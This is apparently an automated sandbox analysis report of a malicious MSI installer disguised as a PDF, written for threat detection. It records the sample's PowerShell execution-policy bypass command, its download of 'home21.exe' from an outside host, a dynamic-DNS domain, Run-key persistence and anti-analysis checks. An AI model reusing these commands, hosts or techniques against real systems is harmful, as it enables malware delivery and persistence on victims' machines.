Edit tour

Windows Analysis Report
hANEXOPDF.PDF40 234057.msi

Overview

General Information

Sample name:	hANEXOPDF.PDF40 234057.msi
Analysis ID:	1467807
MD5:	111a4b1ab79f6dcc0df5389870b547f6
SHA1:	83301a3fbb8e0312307f34955d3873cbd42e09cc
SHA256:	f610dbd7208f00b242b9f548410aa1e428e5daf9479d9807095195f6a6a03a73
Tags:	msi
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected MalDoc

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

Creates autostart registry keys with suspicious values (likely registry only malware)

Hides threads from debuggers

Machine Learning detection for dropped file

PE file contains section with special chars

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious MsiExec Embedding Parent

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7524 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\hANEXOPDF.PDF40 234057.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7564 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7612 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CE2D7E5D3114F90E94C35CC7545C98DA MD5: 9D09DC1EDA745A5F87553048E57620CF)

powershell.exe (PID: 7688 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

home21.exe (PID: 8028 cmdline: "C:\Users\Public\Documents\home21.exe" MD5: FDC0384EA73D7D57C04D471C6CBBAD94)

chrome.exe (PID: 6868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://winhomemodulo.ddns.net/w2/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 --field-trial-handle=2096,i,1416669243780171068,6153319539706403658,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wscript.exe (PID: 6992 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

home21.exe (PID: 4440 cmdline: "C:\Users\Public\Documents\home21.exe" MD5: FDC0384EA73D7D57C04D471C6CBBAD94)

wscript.exe (PID: 4116 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
hANEXOPDF.PDF40 234057.msi	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
hANEXOPDF.PDF40 234057.msi	JoeSecurity_MalDoc	Yara detected MalDoc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Installer\6dba16.msi	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Windows\Installer\6dba16.msi	JoeSecurity_MalDoc	Yara detected MalDoc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000003.1861648679.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: powershell.exe PID: 7688	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_7688.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\home21.exe" , CommandLine: "C:\Users\Public\Documents\home21.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\home21.exe, NewProcessName: C:\Users\Public\Documents\home21.exe, OriginalFileName: C:\Users\Public\Documents\home21.exe, ParentCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Documents\home21.exe" , ProcessId: 8028, ProcessName: home21.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Documents\DiavcthD.vbs, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\home21.exe, ProcessId: 8028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DiavcthD

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding CE2D7E5D3114F90E94C35CC7545C98DA, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7612, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7688, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding CE2D7E5D3114F90E94C35CC7545C98DA, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7612, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7688, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs" , ProcessId: 6992, ProcessName: wscript.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7688, TargetFilename: C:\Users\Public\Documents\home21.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding CE2D7E5D3114F90E94C35CC7545C98DA, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7612, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7688, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Documents\DiavcthD.vbs, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\home21.exe, ProcessId: 8028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DiavcthD

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7688, TargetFilename: C:\Users\Public\Documents\home21.exe

Sigma detected: Suspicious MsiExec Embedding Parent

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs" , ProcessId: 6992, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding CE2D7E5D3114F90E94C35CC7545C98DA, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7612, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue.", ProcessId: 7688, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 480, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Documents\home21.exe

Joe Sandbox ML: detected

Source: https://www.google.com.br/	HTTP Parser: No favicon
Source: https://www.google.com.br/	HTTP Parser: No favicon
Source: https://www.google.com.br/	HTTP Parser: No favicon
Source: https://ogs.google.com.br/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com.br&cn=callout&pid=1&spid=538&hl=en	HTTP Parser: No favicon
Source: https://ogs.google.com.br/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com.br&cn=callout&pid=1&spid=538&hl=en	HTTP Parser: No favicon
Source: https://ogs.google.com.br/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com.br&cn=callout&pid=1&spid=538&hl=en	HTTP Parser: No favicon
Source: https://ogs.google.com.br/widget/app/so?awwd=1&gm3=1&origin=https%3A%2F%2Fwww.google.com.br&cn=app&pid=1&spid=538&hl=en	HTTP Parser: No favicon
Source: https://ogs.google.com.br/widget/app/so?awwd=1&gm3=1&origin=https%3A%2F%2Fwww.google.com.br&cn=app&pid=1&spid=538&hl=en	HTTP Parser: No favicon
Source: https://ogs.google.com.br/widget/app/so?awwd=1&gm3=1&origin=https%3A%2F%2Fwww.google.com.br&cn=app&pid=1&spid=538&hl=en	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.111.168.85:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.4:49827 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb\ source: hANEXOPDF.PDF40 234057.msi, MSIBC4E.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: hANEXOPDF.PDF40 234057.msi, MSIBC4E.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: hANEXOPDF.PDF40 234057.msi, MSIBBBE.tmp.1.dr, MSIBBDE.tmp.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

Yara detected MalDoc

Source: Yara match	File source: hANEXOPDF.PDF40 234057.msi, type: SAMPLE
Source: Yara match	File source: C:\Windows\Installer\6dba16.msi, type: DROPPED

Uses dynamic DNS services

Source: unknown

DNS query: name: winhomemodulo.ddns.net

Source: global traffic

HTTP traffic detected: GET /xxx/home21.exe HTTP/1.1Host: teste.meuly.onlineConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: COGECO-PEER1CA COGECO-PEER1CA

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.29
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157

Source: global traffic	HTTP traffic detected: GET /xxx/home21.exe HTTP/1.1Host: teste.meuly.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BN45lRbF8D5mNkZ&MD=SD7sv3mO HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BN45lRbF8D5mNkZ&MD=SD7sv3mO HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
